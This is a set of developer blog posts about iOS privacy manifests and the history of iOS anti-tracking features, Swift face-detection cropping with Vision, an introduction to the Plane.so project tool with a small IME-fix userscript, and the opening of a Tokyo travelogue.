Xcode 15 can generate a Privacy Report from the Manifests, which developers can use to fill in the App's privacy settings on the App Store.
To prevent the misuse of certain Foundation APIs that could potentially lead to fingerprinting, Apple has started to regulate some Foundation APIs; a declaration of usage is required in the Manifest.
Currently, the most affected API is UserDefaults, which requires a declaration.
Starting in Fall 2023, if you upload a new app or app update to App Store Connect that uses an API requiring a declaration (including content from third-party SDKs), and you do not provide an approved reason in the app's privacy list, you will receive a notification. Starting in Spring 2024, to upload new apps or app updates to App Store Connect, you will need to specify the approved reason in the app's privacy list to accurately reflect how your app uses the respective API.
+
+If the current scope of approved reasons does not cover a use case for an API requiring a declaration, and you believe this use case directly benefits your app users, please let us know.
+
APIs that send tracking information need to declare the domain in the privacy manifest (.xcprivacy) and can only initiate network requests after the user consents to tracking; otherwise, all network requests to this domain will be intercepted by the system.
You can check whether a Tracking Domain is being intercepted using the Xcode Network tool:
Currently, Facebook and Google’s Tracking Domains are detected and need to be listed as Tracking Domains and require permission.
Therefore, please note that FB/Google data statistics may significantly drop after iOS 17, as data will not be received if permission is not asked or tracking is not allowed; based on past implementations of asking for tracking permission, about 70% of users will click not allow.
Fingerprinting is still prohibited.
I am honored to participate in the MOPCON speech, but it is a pity that it has been changed to an online live broadcast due to the pandemic, and I cannot meet more new friends. The theme of this speech is “The Past and Present of iOS Privacy and Convenience,” mainly to share Apple’s principles on privacy and the functional adjustments iOS has made over the years based on these privacy principles.
The Past and Present of iOS Privacy and Convenience | Pinkoi, We Are Hiring!
In recent years, developers or iPhone users should be familiar with the following feature adjustments:
If you are not familiar with Apple’s privacy principles, you might even wonder why Apple has been constantly opposing developers and advertisers in recent years. Many features that everyone is used to have been blocked.
After going through “ WWDC 2021 — Apple’s privacy pillars in focus “ and “ Apple privacy white paper — A Day in the Life of Your Data “, it became clear that we have unknowingly leaked a lot of personal privacy, allowing advertisers or social media to profit immensely, infiltrating our daily lives.
Referencing the Apple privacy white paper and rewriting it, let’s take the fictional character Harry as an example to illustrate how privacy is leaked and the potential harm it can cause.
First is the usage record on Harry’s iPhone.
On the left is the web browsing history: You can see visits to websites related to cars, iPhone 13, and luxury goods.
On the right are the installed apps: There are investment, travel, social, shopping, and baby monitor apps.
Harry’s offline life
Offline activities leave records in places such as invoices, credit card transaction records, dashcams, etc.
You might think, how could different websites, different apps (even without logging in), and offline activities possibly allow a service to link all the data together?
The answer is: technically, it is possible, and it “might” or “has already” happened partially.
As shown in the image above:
It is technically feasible; so who are the third parties behind all the websites and apps?
Large companies like Facebook and Google earn significant revenue from personal ads; many websites and apps also integrate Facebook and Google SDKs… so it’s hard to say. Often, we don’t even know which third-party ad and data collection services websites and apps use, secretly recording our every move.
Let’s assume that all of Harry’s activities are secretly collected by the same third party, then in its eyes, Harry’s profile might look like this:
On the left is personal information, possibly from website registration data or delivery data; on the right are behavior and interest tags based on Harry’s activity records.
In its eyes, it might know Harry better than Harry knows himself; this data can be used on social media to make users more addicted; used in advertising, it can stimulate Harry to overconsume or create a birdcage effect (e.g., recommending you buy new pants, then you buy shoes to match, then socks… it never ends).
If you think the above is already scary enough, there’s something even scarier:
Having your personal information and knowing your financial status… the potential for malicious acts is unimaginable, such as kidnapping, theft…
Mainly through legal constraints; it’s hard to ensure services comply 100% of the time, and there are many malicious programs on the internet, making it difficult to guarantee that services won’t be hacked, causing data leaks; in short, “ if someone wants to do evil, it’s technically feasible, relying solely on regulations and corporate conscience is not enough.”
Moreover, we are often “forced” to accept privacy terms, unable to authorize individual privacy settings. Either we don’t use the service at all, or we use it but have to accept all privacy terms; privacy terms are also not transparent, so we don’t know how our data will be collected and used, and we don’t know if a third party is collecting our data without our knowledge.
Additionally, Apple has mentioned that minors’ personal privacy is often collected by services without the consent of their guardians.
Knowing the harm caused by personal privacy leaks, let’s look at Apple’s privacy principles.
Excerpted from the Apple Privacy White Paper, Apple’s ideal is not to completely block but to balance. For example, in recent years, many people have installed AD Block to completely block ads, which is not what Apple wants to see; because if completely disconnected, it’s hard to provide better services.
Steve Jobs said at the 2010 All Things Digital Conference:
I believe people are smart, some people want to share more data than others. Ask them every time, annoy them until they tell you to stop asking, let them know exactly how you are going to use their data. — translated by Chun-Hsiu Liu
Apple believes privacy is a fundamental human right
Understanding the harm of personal privacy leaks and Apple’s privacy principles, let’s look at the technical means; we can see the adjustments iOS has made over the years to protect personal privacy.
As mentioned earlier
🈲, in iOS >= 11, Safari has implemented Intelligent Tracking Prevention (WebKit)
Enabled by default, the browser actively identifies and blocks third-party cookies used for tracking and advertising; and with each iOS version, the identification program is continuously strengthened to prevent omissions.
Using Third-Party Cookies to track users across websites is basically no longer feasible on Safari.
🈲,iOS >= 15 Private Relay
Especially after Third-Party Cookies were banned, more and more services are adopting this method. Apple is also aware of this… Fortunately, in iOS 15, even the IP information is obfuscated for you!
The Private Relay service will first randomly send the user’s original request to Apple’s Ingress Proxy, then randomly dispatch it to the partner CDN’s Egress Proxy, and finally, the Egress Proxy will request the target website.
The entire process is encrypted and can only be decrypted by the chip in your iPhone. Only you know both the IP and the target website of the request simultaneously. Apple’s Ingress Proxy only knows your IP, the CDN’s Egress Proxy only knows Apple’s Ingress Proxy IP and the target website, and the website only knows the CDN’s Egress Proxy IP.
From an application perspective, all devices in the same region will use the same shared CDN’s Egress Proxy IP to request the target website. Therefore, the website cannot use the IP as Fingerprint information anymore.
For technical details, refer to “WWDC 2021 — Get ready for iCloud Private Relay”.
Private Relay Test Image
Apps can use URLSessionTaskMetrics
to analyze Private Relay connection records.
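As a rough illustration (not an official Apple recipe), here is a minimal Swift sketch of collecting URLSessionTaskMetrics via a session delegate; per-transaction fields such as remoteAddress and isProxyConnection can hint at whether a request went through a relay/proxy. The URL is only a placeholder.

import Foundation

final class MetricsLogger: NSObject, URLSessionTaskDelegate {
    // Called once per task after all of its transactions complete.
    func urlSession(_ session: URLSession, task: URLSessionTask,
                    didFinishCollecting metrics: URLSessionTaskMetrics) {
        for transaction in metrics.transactionMetrics {
            print("remote address:", transaction.remoteAddress ?? "unknown")
            print("went through a proxy:", transaction.isProxyConnection)
        }
    }
}

// Usage: attach the delegate to a session and fire a request (placeholder URL).
let session = URLSession(configuration: .default, delegate: MetricsLogger(), delegateQueue: nil)
session.dataTask(with: URL(string: "https://zhgchg.li")!).resume()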
To digress, the method of using IP addresses to obtain Fingerprints to identify users can no longer be used.
🈲,iOS >= 7 prohibits access to Device UUID,
Use IDentifierForAdvertisers/IDentifierForVendor instead
🈲,iOS >= 14.5 IDentifierForAdvertisers requires user consent before use
After iOS 14.5, Apple has strengthened the restrictions on accessing IDFA. Apps need to ask for user permission to track before obtaining the IDFA UUID; without asking or without permission, the value cannot be obtained.
Preliminary survey data from market research companies show that about 70% of users (some say 90% in the latest data) do not allow tracking to access IDFA, which is why people say IDFA is dead!
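For reference, a minimal sketch of asking for tracking permission before reading the IDFA; it assumes NSUserTrackingUsageDescription is set in Info.plist and is not a drop-in from any particular project:

import AppTrackingTransparency
import AdSupport

func fetchIDFAIfAllowed() {
    // The system prompt appears only once; afterwards the stored choice is returned.
    ATTrackingManager.requestTrackingAuthorization { status in
        if status == .authorized {
            let idfa = ASIdentifierManager.shared().advertisingIdentifier
            print("IDFA:", idfa.uuidString)
        } else {
            // Without authorization the identifier is all zeros and useless for tracking.
            print("Tracking not allowed; IDFA unavailable.")
        }
    }
}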
iOS apps can use canOpenURL
to detect if a specific app is installed on the user’s phone.
🈲,iOS >= 9 requires setting in the app before use; cannot detect arbitrarily.
iOS ≥ 15 adds a restriction, allowing a maximum of 50 other app schemes.
Apps linked on or after iOS 15 are limited to a maximum of 50 entries in the LSApplicationQueriesSchemes key.
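A minimal sketch of the detection itself (the instagram scheme is only an example; whatever scheme you query must be whitelisted under LSApplicationQueriesSchemes in Info.plist):

import UIKit

func isInstagramInstalled() -> Bool {
    // Returns false if the scheme is not declared in LSApplicationQueriesSchemes.
    guard let url = URL(string: "instagram://") else { return false }
    return UIApplication.shared.canOpenURL(url)
}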
As mentioned earlier
In the early days, iOS Safari’s cookies and App WebView’s cookies could communicate, allowing data exchange between websites and apps.
The method involves embedding a 1-pixel WebView component in the app’s background to secretly read Safari cookies.
🈲,iOS >= 11 prohibits sharing cookies between Safari and App WebView
If you need to obtain Safari cookies (e.g., using website cookies to log in directly), you can use the SFSafariViewController
component; however, this component forces a prompt window and cannot be customized, ensuring that users are not unknowingly tracked.
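A minimal sketch of presenting it (the URL is a placeholder); the always-visible Safari UI is exactly the point, since it keeps cookie access transparent to the user:

import SafariServices
import UIKit

func openInSafariViewController(from presenter: UIViewController) {
    // Shares Safari's cookies/session storage, but always shows the system browser UI.
    let safari = SFSafariViewController(url: URL(string: "https://zhgchg.li")!)
    presenter.present(safari, animated: true)
}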
As mentioned earlier, iOS ≥ 15 has been obfuscated by Private Relay.
Using the clipboard to transfer cross-platform information, as Apple cannot disable clipboard usage across apps, but it can prompt the user.
⚠️ iOS >= 14 adds clipboard access warnings
Starting from iOS ≥ 16, if the user does not actively perform a paste action, the app’s attempt to read the clipboard will trigger a prompt window, and the user needs to allow it for the app to read the clipboard information.
UIPasteBoard’s privacy change in iOS 16
Here, I want to mention the privacy panic regarding the clipboard in iOS 14. For more details, you can refer to my previous article "iOS 14 Clipboard Privacy Panic: The Dilemma Between Privacy and Convenience".
Although we cannot rule out the possibility of reading the clipboard for data theft, more often, our app needs to provide a better user experience:
Before implementing Deferred Deep Link, when we guide users to install the app from the website, opening the app after installation will only open the homepage by default. A better user experience should be opening the app to the corresponding page where the user left off on the website.
To achieve this functionality, there needs to be a way to transfer data between the website and the app. As mentioned in the article, other methods have been banned, and currently, only the clipboard can be used as a medium for storing information (as shown above).
Including Firebase Dynamic Links and the latest version of Branch.io (previously Branch.io used IP Address Fingerprint to achieve this) also use the clipboard for Deferred Deep Link.
For implementation, you can refer to my previous article: iOS Deferred Deep Link Implementation (Swift)
In general, if it is for Deferred Deep Link, the clipboard information will only be read the first time the app is opened or when returning to the app. It will not be read during use or at odd times, which is worth noting.
A better approach is to use UIPasteboard.general.detectPatterns
to detect if the clipboard data is what we need before reading it.
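A minimal sketch of that idea, assuming we only care about URL-like content; detectPatterns itself does not read the clipboard content (so it does not trigger the paste notice), while actually reading .string afterwards does:

import UIKit

func readClipboardURLIfRelevant() {
    // Probe for a URL-like pattern first, without accessing the content.
    UIPasteboard.general.detectPatterns(for: [.probableWebURL]) { result in
        guard case .success(let patterns) = result, patterns.contains(.probableWebURL) else {
            return // Nothing URL-like on the clipboard; don't touch it.
        }
        DispatchQueue.main.async {
            // Reading the string is what counts as clipboard access.
            print("Clipboard URL:", UIPasteboard.general.string ?? "")
        }
    }
}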
After iOS ≥ 15, the clipboard prompt has been optimized. If it is the user’s own paste action, the prompt will no longer appear!
As mentioned earlier, Apple’s privacy principle hopes for a balance rather than completely blocking users from services.
In Safari, the feature that blocks Intelligent Tracking Prevention is Private Click Measurement (WebKit) used to measure advertising effectiveness without compromising personal privacy.
The specific process is as shown above. When a user clicks an ad on site A and goes to site B, a Source ID (to identify the same user) and Destination information (target site) will be recorded in the browser. When the user completes a conversion on site B, a Trigger ID (representing what action) will also be recorded in the browser.
These two pieces of information will be combined and sent to sites A and B after a random 24 to 48 hours to get the advertising effectiveness.
Everything is handled on-device by Safari, and protection against malicious clicks is also provided by Safari.
You can use SKAdNetwork (requires application to join Apple) similar to Private Click Measurement, which will not be elaborated here.
It is worth mentioning that Apple is not working behind closed doors; SKAdNetwork is currently at version 2.0. Apple continues to collect feedback from developers and advertisers to balance personal privacy control and continuously optimize SDK functionality.
Here, I sincerely wish that Deferred Deep Link can be integrated with the SDK, as we aim to enhance user experience without intending to invade personal privacy.
For technical details, refer to “WWDC 2021 — Meet privacy-preserving ad attribution”.
All apps supporting third-party login on iOS ≥ 13 must implement Sign in with Apple, otherwise, they cannot be successfully listed on the App Store.
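For context, a minimal sketch of the standard entry point (delegate and presentation-context handling are omitted here, and the layout values are arbitrary):

import AuthenticationServices
import UIKit

final class SignInViewController: UIViewController {
    override func viewDidLoad() {
        super.viewDidLoad()
        // System-provided Sign in with Apple button.
        let button = ASAuthorizationAppleIDButton(authorizationButtonType: .signIn,
                                                  authorizationButtonStyle: .black)
        button.frame = CGRect(x: 40, y: 200, width: 240, height: 44)
        button.addTarget(self, action: #selector(signIn), for: .touchUpInside)
        view.addSubview(button)
    }

    @objc private func signIn() {
        let request = ASAuthorizationAppleIDProvider().createRequest()
        request.requestedScopes = [.fullName, .email]
        let controller = ASAuthorizationController(authorizationRequests: [request])
        // Set controller.delegate / presentationContextProvider in a real app to receive the result.
        controller.performRequests()
    }
}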
iOS ≥ 15 iCloud+ users support Hide My Email
Similar to Sign in with Apple, virtual emails generated by Apple replace real emails. After receiving an email, Apple will forward it to your real email, thus protecting your email information.
Similar to a 10-minute email but more powerful; as long as you don’t disable it, the virtual email address is yours permanently; there is no limit to the number of new addresses you can create, and it’s unclear how Apple prevents abuse.
Settings -> Apple ID -> Hide My Email
Apps must explain on the App Store what user data will be tracked and how it will be used .
For detailed information, refer to: “App privacy details on the App Store”.
Starting from iOS ≥ 14, location and photo access can be more finely controlled. You can authorize access to only certain photos or allow location access only while using the app.
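A minimal sketch of checking for the new limited photo access level and the while-in-use location permission (the corresponding Info.plist usage descriptions are assumed to be configured):

import Photos
import CoreLocation

func requestGranularPermissions(with locationManager: CLLocationManager) {
    // iOS 14: the user may grant access to only a selection of photos (.limited).
    PHPhotoLibrary.requestAuthorization(for: .readWrite) { status in
        switch status {
        case .limited:    print("Access to selected photos only")
        case .authorized: print("Full photo library access")
        default:          print("No photo access")
        }
    }

    // Location only while the app is in use.
    locationManager.requestWhenInUseAuthorization()
}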
Starting from iOS ≥ 15, the CLLocationButton button is added to enhance user experience. It allows obtaining the current location through user clicks without asking for permission or consent. This button cannot be customized and can only be triggered by user actions.
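A minimal sketch of wiring it up (layout and naming are arbitrary here, and NSLocationWhenInUseUsageDescription is assumed to be in Info.plist); tapping the system-drawn button grants a one-time location fix, which we then fetch with a normal CLLocationManager request:

import UIKit
import CoreLocation
import CoreLocationUI

final class LocateViewController: UIViewController, CLLocationManagerDelegate {
    private let manager = CLLocationManager()

    override func viewDidLoad() {
        super.viewDidLoad()
        manager.delegate = self

        // Appearance is limited to system-provided icons/labels; it cannot be fully customized.
        let button = CLLocationButton()
        button.icon = .arrowFilled
        button.label = .currentLocation
        button.frame = CGRect(x: 40, y: 120, width: 220, height: 44)
        button.addTarget(self, action: #selector(locate), for: .touchUpInside)
        view.addSubview(button)
    }

    @objc private func locate() {
        manager.requestLocation() // one-shot request, allowed by the button tap
    }

    func locationManager(_ manager: CLLocationManager, didUpdateLocations locations: [CLLocation]) {
        if let location = locations.first {
            print("Current location:", location.coordinate.latitude, location.coordinate.longitude)
        }
    }

    func locationManager(_ manager: CLLocationManager, didFailWithError error: Error) {
        print("Location error:", error)
    }
}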
iOS ≥ 15, added personal privacy usage prompts, such as: clipboard, location, camera, microphone
iOS ≥ 15, can export a report of all apps’ privacy-related usage and network activity for the past 7 days.
The export is a plain-text .ndjson file and is not easy to read directly; you can first download the "Privacy Insights" app from the App Store to view the report.
As mentioned in the news, WeChat indeed secretly reads photo information in the background when the app is launched.
Additionally, I also caught a few other Chinese apps doing sneaky things, so I directly disabled all their permissions in settings.
If it weren’t for this feature exposing them, who knows how long our data would have been stolen!
After understanding the adjustments to privacy features over the years, let’s revisit Apple’s privacy principles:
Returning to the initial technical means of piecing together Harry’s correlation diagram, the connections between websites or apps are blocked, leaving only the clipboard, which will prompt.
For service registration and third-party login information, you can use Sign in with Apple and hide my email features to prevent leaks; or use more native iOS apps.
Offline activities might be protected by using Apple Card to prevent privacy leaks?
No one has the chance to piece together Harry’s activity profile anymore.
Therefore, “human-centric” is the term I would use to describe Apple’s philosophy. Going against the commercial market requires a strong belief. Related to this, “technology-centric” is the term I would use for Google, as Google always creates many geeky tech projects. Lastly, “business-centric” is the term I would use for Facebook, as FB pursues commercial gains on many levels.
In addition to adjustments for privacy features, iOS has continuously enhanced features to prevent phone addiction over the past few years, introducing “Screen Time Report,” “App Usage Limits,” “Focus Mode,” and more; helping everyone break free from phone addiction.
Live a brilliant life in the real world!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Practical Application of Vision
Before Optimization V.S. After Optimization — Marry Me APP
With the recent iOS 12 update, I noticed the new CoreML machine learning framework and found it quite interesting. I began to think about how to incorporate it into our current products.
The article on trying out CoreML is now available: Automatically Predict Article Categories Using Machine Learning, Even Train the Model Yourself
CoreML provides the ability to train and reference machine learning models for text and images in an app. Initially, I thought of using CoreML for face recognition to address the issue of cropping heads or faces in the app, as shown on the left in the image above. Faces can easily be cut off due to scaling and cropping if they appear at the edges.
After some online research, I realized my knowledge was limited, and this functionality was already available in iOS 11 through the “Vision” framework, which supports text detection, face detection, image comparison, QR code detection, object tracking, and more.
In this case, I utilized the face detection feature from Vision and optimized it as shown on the right in the image; finding faces and cropping around them.
Demo APP
As shown in the completed image above, it can mark the positions of faces in the photo.
P.S. It can only mark “faces,” not the entire head including hair 😅
This program mainly consists of two parts. The first part addresses the issue of white space when resizing the original image to fit into an ImageView. In simple terms, we want the ImageView size to match the image size. Directly inserting the image can cause misalignment as shown below.
You might consider changing the ContentMode to fill, fit, or redraw, but this may cause distortion or cropping of the image.
let ratio = UIScreen.main.bounds.size.width
// Here, I set the alignment of my UIImageView to 0 on both sides, with an aspect ratio of 1:1

let sourceImage = UIImage(named: "Demo2")?.kf.resize(to: CGSize(width: ratio, height: CGFloat.leastNonzeroMagnitude), for: .aspectFill)
// Using Kingfisher's image resizing feature, based on width, with flexible height

imageView.contentMode = .redraw
// Using redraw to fill the contentMode

imageView.image = sourceImage
// Assigning the image

imageViewConstraints.constant = (ratio - (sourceImage?.size.height ?? 0))
imageView.layoutIfNeeded()
imageView.sizeToFit()
// Here, I adjust the constraints of the imageView. For more details, refer to the complete example at the end of the article
The above is the processing for images.
The cropping part uses Kingfisher to assist us, and can also be replaced with other libraries or custom methods.
Next, let’s focus on the code directly.
if #available(iOS 11.0, *) {
    // Supported on iOS 11 and later
    let completionHandle: VNRequestCompletionHandler = { request, error in
        if let faceObservations = request.results as? [VNFaceObservation] {
            // Recognized faces

            DispatchQueue.main.async {
                // Operating on UIView, so switch back to the main thread
                let size = self.imageView.frame.size

                faceObservations.forEach({ (faceObservation) in
                    // Coordinate system conversion
                    let translate = CGAffineTransform.identity.scaledBy(x: size.width, y: size.height)
                    let transform = CGAffineTransform(scaleX: 1, y: -1).translatedBy(x: 0, y: -size.height)
                    let transRect = faceObservation.boundingBox.applying(translate).applying(transform)

                    let markerView = UIView(frame: transRect)
                    markerView.backgroundColor = UIColor.init(red: 0/255, green: 255/255, blue: 0/255, alpha: 0.3)
                    self.imageView.addSubview(markerView)
                })
            }
        } else {
            print("No faces detected")
        }
    }

    // Recognition request
    let baseRequest = VNDetectFaceRectanglesRequest(completionHandler: completionHandle)
    let faceHandle = VNImageRequestHandler(ciImage: ciImage, options: [:])
    DispatchQueue.global().async {
        // Recognition takes time, so run it on a background thread to avoid freezing the UI
        do {
            try faceHandle.perform([baseRequest])
        } catch {
            print("Throws: \(error)")
        }
    }

} else {
    // Vision is not available below iOS 11
    print("Not supported")
}
The main thing to note is the coordinate-system conversion: Vision returns detected bounding boxes in the image's normalized coordinate space (values from 0 to 1, with the origin at the bottom-left), so we have to convert them to the ImageView's actual UIKit coordinates before they can be used.
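For reference, the conversion can be pulled out into a small standalone helper. This is only a sketch based on the code above (the function name is my own, not part of the original project), assuming the target view uses UIKit's top-left-origin coordinates:

import UIKit
import Vision

// Sketch: convert Vision's normalized, bottom-left-origin boundingBox (values 0...1)
// into a CGRect expressed in a view's top-left-origin coordinate space of the given size.
func convertVisionRect(_ boundingBox: CGRect, toViewOf size: CGSize) -> CGRect {
    let scale = CGAffineTransform.identity.scaledBy(x: size.width, y: size.height) // scale 0...1 up to points
    let flip = CGAffineTransform(scaleX: 1, y: -1).translatedBy(x: 0, y: -size.height) // flip the Y axis
    return boundingBox.applying(scale).applying(flip)
}

// Usage (hypothetical): let rect = convertVisionRect(faceObservation.boundingBox, toViewOf: imageView.frame.size)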
let ratio = UIScreen.main.bounds.size.width
// Here, because I set the left and right alignment of my UIImageView to 0, with a ratio of 1:1; details can be found in the complete example at the end

let sourceImage = UIImage(named: "Demo")

imageView.contentMode = .scaleAspectFill
// Use scaleAspectFill mode to fill

imageView.image = sourceImage
// Assign the original image; we will operate on it later

if let image = sourceImage, #available(iOS 11.0, *), let ciImage = CIImage(image: image) {
    let completionHandle: VNRequestCompletionHandler = { request, error in
        if request.results?.count == 1, let faceObservation = request.results?.first as? VNFaceObservation {
            // Exactly one face
            let size = CGSize(width: ratio, height: ratio)

            let translate = CGAffineTransform.identity.scaledBy(x: size.width, y: size.height)
            let transform = CGAffineTransform(scaleX: 1, y: -1).translatedBy(x: 0, y: -size.height)
            let finalRect = faceObservation.boundingBox.applying(translate).applying(transform)

            let center = CGPoint(x: (finalRect.origin.x + finalRect.width/2 - size.width/2), y: (finalRect.origin.y + finalRect.height/2 - size.height/2))
            // Calculate the offset of the face area's center point

            let newImage = image.kf.resize(to: size, for: .aspectFill).kf.crop(to: size, anchorOn: center)
            // Crop the image around the center point

            DispatchQueue.main.async {
                // Operating on UIView, so switch back to the main thread
                self.imageView.image = newImage
            }
        } else {
            print("Detected multiple faces or no faces detected")
        }
    }
    let baseRequest = VNDetectFaceRectanglesRequest(completionHandler: completionHandle)
    let faceHandle = VNImageRequestHandler(ciImage: ciImage, options: [:])
    DispatchQueue.global().async {
        do {
            try faceHandle.perform([baseRequest])
        } catch {
            print("Throws: \(error)")
        }
    }
} else {
    print("Not supported")
}
The logic is similar to marking the position of a face, the difference is that the avatar part has a fixed size (e.g. 300x300), so we skip the first part that requires the Image to fit the ImageView.
Another difference is that we need to calculate the center point of the face area and use this center point as the reference for cropping the image.
The red dot is the center point of the face area.
The frame just before the blink shows the original image position.
The code has been uploaded to Github: Click here
For any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Introduction to the Plane.so project management tool with a Scrum process
At my previous company Pinkoi, I first experienced the power of Asana project management tool. Whether it was internal project management or collaboration across teams, Asana played a role in decoupling dependencies between individuals and tasks, enhancing collaboration efficiency.
In my previous company, all teams, from product teams to operations, business teams (such as HRBP, Finance, Marketing, BD, etc.), had a publicly accessible Project as a single collaboration entry point across teams. When other teams needed assistance, they could directly create a Task (which could also be from a Template Task) in that Project (usually with a Need Help! Section). The team would then take over the Task internally for execution.
Cross-team collaboration with the operations team, such as procurement and recruitment processes, could be created and tracked directly through Asana; the same applied to collaboration with business teams, for example marketing campaign planning and tasks requiring engineering assistance.
Without Asana or similar project management tools:
Returning to project management, Asana provides flexible, multidimensional, and automated project management tools that can be customized according to requirements.
There are many ways to use Asana. The following are just a few examples of use cases. It is recommended to determine your needs before applying relevant Asana examples.
Asana’s Taiwan distributor also provides comprehensive educational training. If interested, you can contact them.
(This article is not sponsored)
Example 1
Team Project
Team Scrum Project
In addition to the main team Project, a Scrum Project is created to manage tasks (Asana tasks can be added to multiple Projects simultaneously) and review the execution content of each Sprint.
Example 2
Example two uses Sections to differentiate Sprints, creating a new Section each week for tasks and using Labels to mark other statuses.
As mentioned earlier, the scenarios with Asana project management tools at my previous company Pinkoi. In the past few months, returning to an environment without project management tools has made me realize the importance of tools for work efficiency.
My current environment does not have a modern project management tool; due to procurement (expense control), internal control requirements (intranet only), and personal data audit restrictions (must be on-premises), Asana cannot simply be introduced.
Due to the above environmental limitations, we can only start with open-source and self-hosted project management tools. The solutions found are nothing more than: Redmine, OpenProject, Taiga… Several solutions were tried, but the results were not as expected, lacking functionality and having unfriendly UI/UX. It wasn’t until I accidentally found a project management tool called Plane.so, which was newly launched in January 2023.
By the way, I recommend this website, which includes many services that support self-hosting:
awesome-selfhosted A list of Free Software network services and web applications which can be hosted on your own servers awesome-selfhosted.net
That’s enough talk, let’s get to the main content.
This document is divided into:
You can refer to the next section “ Plane.so Docker Self-Hosted Setup Record “ for Docker self-hosted setup instructions.
Plane was founded in 2022 and is a startup company from Delaware, USA, and India. Currently, most of the developers observed on Linkedin and Github are in India. The company has raised $4 million in seed funding (invested by OSS Capital).
Currently, Plane ranks first in the Github project management category, is open-source using the AGPL-3.0 license, was launched in January 2023, and is still in the development phase, with no official release yet.
Please note: ⚠️ open-source does not mean free ⚠️. The situation is like GitHub and GitLab: there are many project management tools similar to Asana, Jira, and ClickUp, but no open-source product strong enough to compete the way GitLab does. Plane aims to be the GitLab of project management tools.
You can refer to the Plane Product Roadmap on the official website:
Open Source Repo:
Plane offers cloud-based services starting at $0, with Pro providing more frameworks and integration, as well as automation features.
The Community Edition (officially referred to as CE) is the self-hosted version and also starts at $0; if you want the advanced features you still need to purchase Pro, which can also be self-hosted.
Plane.so does not have Asana's multidimensional flexibility; instead, Plane builds project management out of the following components:
Currently, the free version and CE (Self-Hosted) version do not have this feature.
We can quickly and freely start using the Plane Cloud version directly:
Plane | Simple, extensible, open-source project management tool. Open-source project management tool to manage issues, sprints, and product roadmaps with peace of mind. app.plane.so
After creation, you can switch between different Workspaces on the Workspace dropdown menu and also access Workspace Settings from here:
One of the most important settings is Members, where we need to invite team members to join the Workspace:
Enter Projects to view all public and joined Projects:
APP-1
In the top right corner of the Project, click on "…" to:
Other settings:
Click "Create Issue" to start creating an Issue. For example, give it a title such as "Login optimization" and assign it to a Project such as "App"… (these settings will be introduced later), and set the Cycle to something like W22, S22, or 2024-05… (these settings will be introduced later).
Create Issue content using AI:
After creating the Issue, clicking on it in the list will bring up the Issue Preview window, where you can click to expand into the Issue Full-Screen page:
Click to expand into the Issue Full Screen Detail page:
Currently, only Email notifications are available:
Plane Documentation - Plane Plane is an extensible, open source project and product management tool. It allows users to start with a basic task… docs.plane.so
The above is the usage introduction for version 0.20-Dev as of May 25, 2024. The official team is still actively developing new features and optimizing user experience. The functionality mentioned above may be improved in the future. Please refer to the latest version for the best experience.
During the development of the project, there may be bugs and user experience issues. Please be patient with the Plane.so team. If you have any questions, feel free to report them below:
Sprints/Cycles can be named by week, e.g. W12, or with a date format like 2024-05-27.
The above is just one example of a workflow. Please note that there is no perfect process, only the one that suits your team; refer to the structure provided by Plane.so, unleash your creativity, and find the project management approach that works best for you.
Plane.so has a clean frontend-backend separation architecture and provides a comprehensive API. After creating an API Token in Workspace Settings, you can call the API by sending it in the X-API-Key request header; for the available API endpoints, refer to the official API documentation.
However, since the official documentation is not yet complete and many endpoints are not listed, the quickest way is to open the browser developer tools, watch the Network requests to see how the official site calls its own API, and then apply your own key.
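As a rough illustration only (the base URL, endpoint path, workspace slug, and token below are placeholders and assumptions on my part, so double-check them against the official API docs or the requests you see in the Network tab), a request carrying the X-API-Key header could look like this in Swift:

import Foundation

// Sketch: listing projects in a workspace via Plane's REST API.
// The endpoint path and values here are assumptions for illustration; verify them against the official docs.
let workspaceSlug = "your-workspace-slug"   // hypothetical workspace slug
let apiToken = "YOUR_API_TOKEN"             // token created in Workspace Settings
let url = URL(string: "https://api.plane.so/api/v1/workspaces/\(workspaceSlug)/projects/")!

var request = URLRequest(url: url)
request.httpMethod = "GET"
request.setValue(apiToken, forHTTPHeaderField: "X-API-Key") // the header mentioned above

URLSession.shared.dataTask(with: request) { data, _, error in
    if let data = data, let body = String(data: data, encoding: .utf8) {
        print(body) // inspect the raw JSON to learn the response shape
    } else if let error = error {
        print("Request failed: \(error)")
    }
}.resume()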
I opened an issue with the official team and traced the source code; I feel the chances of a fix are low, because the editor never considered composing text with an IME (e.g. selecting characters when typing Chinese) and directly binds the keyboard Enter event to submitting the comment.
Browser Extension Workaround:
Here is a workaround JavaScript script I wrote to hook the Enter event.
This uses a user-script extension for Chromium-based browsers; other browsers can use similar JavaScript injection tools.
document.addEventListener('keydown', function(event) {
    if (event.key === 'Enter' || event.keyCode === 13) { // event.keyCode is for older browsers
        const focusedElement = document.activeElement;
        const targetButtons = focusedElement.parentElement.parentElement.parentElement.parentElement.parentElement.querySelectorAll('button[type="submit"]');
        if (targetButtons.length > 0 && targetButtons[0].textContent.trim().toLowerCase() === "comment") {
            console.log("HIT");
            // Keep focus on the active element and place the cursor at the end
            focusedElement.focus();
            if (window.getSelection) {
                var range = document.createRange();
                var selection = window.getSelection();
                range.selectNodeContents(focusedElement);
                range.collapse(false);
                selection.removeAllRanges();
                selection.addRange(range);
            }
            event.stopImmediatePropagation();
        }
    }
}, true);
Go back to Plane.so (refresh) and open an Issue to test the Comment function.
Because Plane.so is still in the development stage and the product is very new, it is uncertain whether there are security issues. It is recommended not to upload any sensitive data to avoid data leakage in case of major issues with the service, or use Self-Hosted to self-host for local intranet use.
For any questions and suggestions, please feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Record and travel information for a 5-day free and easy trip to Tokyo in June 2023, following the Kansai region trip last month.
Following the previous post "[Travelogue] 2023 Kansai Region & 🇯🇵 First Landing", I quickly returned to Japan a week later.
You may wonder why not stay in Japan and take the Shinkansen from Osaka to Tokyo directly? The reason is that the Tokyo trip was actually the originally planned overseas trip, while the Kansai region trip was just an impromptu decision.
Plus, I didn’t want to change flight tickets, accommodations, and have to Work From Japan for a week (I believe in pure enjoyment when traveling), so I returned to Taiwan after the Kansai region trip.
Looking back, it was a good decision to return; because during the week I returned to Taiwan, Japan was hit by a super typhoon, causing flooding, Shinkansen suspension, and overcrowded train stations; if I had been in Japan that week, there wouldn’t have been many places to go. (Finally, not the rain god anymore!)
Myself, current colleague (Sean), and former colleague (James Lin); where Sean and James are university classmates. (Yes, the industry is that small XD)
For information on entering Japan and other insights, please refer to the previous post.
